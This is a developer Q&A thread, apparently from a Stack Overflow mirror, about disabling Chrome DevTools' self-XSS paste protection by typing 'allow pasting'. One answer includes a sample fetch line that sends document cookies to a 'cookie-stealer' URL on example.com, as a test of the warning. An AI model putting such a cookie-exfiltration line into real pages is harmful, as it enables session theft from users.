In recent versions of Google Chrome, I've encountered a highly frustrating issue where pasting into the developer console is disabled. This is incredibly inconvenient as I rely on the developer console daily. I may have to consider switching browsers, which I'd rather not do.
Disable paste protection in Chrome DevTools?
Asked Answered
Update 2024
You can disable it by typing allow pasting in the dev console.
What is it?
Ostensibly, it's this experimental feature in DevTools:
If you are a new DevTools user and you attempt to paste code, the Sources panel now shows you the Do you trust this code? dialog and the Console now displays a similar warning. Paste only the code that you understand and have reviewed yourself. To paste, type "allow pasting" when prompted. Once pasting has been allowed once, the warning will never be shown again.
Apparently this was proposed back in 2014.
How do I turn it on/off?
Open DevTools > Settings (top-right corner) > Experiments > Toggle Show warning about Self-XSS when pasting code
....however in Chrome 120 (December 2023) I'm able to paste self-0wning code into the console with no warnings or messages, curious.
I'm curious if anyone else gets a message - try copying+pasting the below script.
fetch( 'https://example.com/cookie-stealer?' + document.cookies )
any option disable from process argument? –
Lamaism
Thanks for answer. Not working in Private mode. Required type every time. –
Manvell
@Manvell If it isn't working for you in Incognito mode, have you first disabled it in normal mode (and also fully restarted Chrome)? –
Tambour
@Dai, did you try to check your suggestion by yourself before advising?) –
Alfano
@MaksymKosenko Yes, of course - except in my case, I never get the paste warning, whether or not the checkbox (in the Experiments page) is checked or not - ditto Incognito mode or not. Other people are noticing this too: there seems to be some kind of hidden-state for this feature which isn't exposed anywhere. –
Tambour
Hm, interesting, for me it does not work in Linux/MacOs/Win11 –
Alfano
@Dai, Yes, I did it. –
Manvell
The reason you may not see this warning is because the warning only fires once per Chrome profile, and will only show up if you've run less than 5 prior commands in the console. –
Hite
In 2024, they removed "show self-XSS warning" toggle. –
Hipolitohipp
it's true, they removed the option, it's f**king annoying –
Dorinedorion
Yeah, "never again" means "never again in the same section", so if you're say, debugging in Selenium, which often opens a new session every single time you run a test, you wind up typing "allow pasting" 100 times a day. Awesome! –
Hewes
Is there a flag to disable this when starting chrome from the command line? –
Unstained
This is the most annoying thing that has ever happened. I can't even paste the stupid "allow pasting" thing because it won't let me paste. –
Argile
Since 2024, Chrome has removed the toggle which previously allowed the disabling of the paste-protection. Now you can disable it by typing in allow pasting in the dev console.
Ref: https://rjroopal.medium.com/stay-secure-with-chromes-new-paste-protection-3f80c82f9dcf
The simplest way is this
- Type "
allow pasting" (without quotes) into the console. - Press the Enter key on your keyboard.
![enter image description here]()
this answere was already provided 2 weeks before –
Consistent
This answer was not provided, don't forget this point, sometimes the answers are similar, but the simpler answer is better. And it is the users who determine which answer helps them the most Thank you for your comment @Consistent –
Melanism
Yes it was... your answere was posted May 13th, L. Aleksiev postet his answere on April 29th! Your post doesnt make it simpler because you add pictures or so. But i assume you just viewed the accepted answere without checking the other ones. And even the accepted answere was edited before yours (May 3rd) an provided the correct way on how to do it. –
Consistent
Well, there is a new convention that Chrome is following these days where it has removed the option to disable it traditionally available.
Whenever you find Don’t paste code into the DevTools Console that you don’t understand or haven’t reviewed yourself... just type into the console allow pasting (press Enter) and then you should be able to paste the code.
;)
Right. In that one session. Which means for us selenium users, retyping it over and over and over and over and over and over and it's much more annoying than I'm communicating here. –
Hewes
The OP was never about Selenium users. For your scenario you could try executing the script as follows: gist.github.com/ShayanAhmad/a2c21322be93a957a7444d35be25ded4 Let me know if that works. –
Untruth
Selenium users are a subset of devs who may rely on pasting into the console, which the question is about. However the window happened to come to be opened prior to needing to paste shouldn't matter. This solution works only per session; not all users always stay in one single session, especially not devs, and that's not specific to any one tool. Thanks for the gist but the
executeScripts (I'm using node) throw an error, javascript error: Cannot set properties of null (setting 'value'). Too fragile a kludge to use in unit test code, product owner will never go for it. Thanks tho, apprectd. –
Hewes How can you disallow it again after that one paste operation you wanted? –
Atwitter
Thank you very much. Highest answer is not relevant anymore. –
Volost
this answere was already provided 4 days before –
Consistent
© 2022 - 2024 — McMap. All rights reserved.
pastein the search box at the top and it'll show you the relevant experiment. – Codie